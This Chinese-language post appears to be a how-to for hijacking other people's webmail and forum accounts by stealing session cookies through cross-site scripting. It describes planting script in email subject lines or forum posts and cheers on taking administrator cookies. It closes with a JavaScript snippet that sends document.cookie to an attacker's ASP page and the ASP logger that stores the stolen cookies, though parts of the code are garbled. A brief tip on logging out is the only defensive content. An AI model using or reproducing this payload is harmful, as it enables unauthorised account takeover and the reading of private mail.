通过Cookie进入他人Email与论坛

现在网络上的系统,都是采用会员式登录模式。为了不使用户每天都要频繁的输入用户名与密码进行登录。系统大多都采用cookie信息进行验证。

 

如果我们也能拿到某个会员的cookie信息,就可以模似该用户进入到系统中,以此用户的身份进行操作。

 

如:在邮件系统中,国内的大多数邮件系统,都可以采用这个方法进行非法获取到他人信息,从而可以看到别人的邮件,还可以进行收发操作。如果把偷cookie的代码放在邮件的标题里,从而构造一个特殊的邮件。发到对方的邮箱中,只要对方打开邮箱,不用点击查看邮件内容。就可以拿到对方的cookie,从而进入到对方的邮箱,令对方防不胜防。

 

如:在BBS论坛中,我们发了一个特殊的贴子,里面放上我们的代码,只要打开我们的页面就可以拿到对方的cookie信息。

 

由于cookie本身没有保护功能,我们可以把对方机器上的所有cookie信息都取出来!然后做事后分析。查出相对应的系统,进行非法进入。如果拿到是一些管理员的cookie,那你就发了!

 

防止工作:请大家不要保存cookie,这是最好的防止方法,但基本上做不到。

请大家工作完成后,要点击“退出”,清除cookie内容。让这个cookie信息失效。一般cookie信息为24小时(邮件系统),其他系统也都会有写明过期时间,如,在论坛登录时,可以选择1个月,1天,1年等方式。请大家关闭之前,点击“退出”,cookie信息失效。 这样对方就是拿到你的cookie信息,也无法进入到系统中。

 

 

偷取Cookie代码

 

通过以下脚本引入一个js,document.write(""),然后js内容为:

var code;         
var target = "http://www.xxx.net/cookie.asp?";  // 你的网站的某个ASP页面。
info=escape(document.location+"@@@"+document.cookie);
target=target+info;
code="";
document.write(code);

这样就可以将cookie等信息传到我们的站点了!cookie.asp内容为:

dim fso,file,str        
str=unescape(request.Servervariables("QUERY_STRING"))    
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set fso = Server.CreateObject("Scripting.FileSystemObject") 
path = server.mappath("xxx.txt")        //  指定的要打开的文件名称。 可以把所有cookie信息都取出来。
set file=fso.opentextfile(path, ForAppending, TRUE)   
file.write("Xss:")
file.write(str)        
file.write vbCrLf       
file.close
set file = nothing        
set fso = nothing

你可能感兴趣的:(安全,个人,软件经济)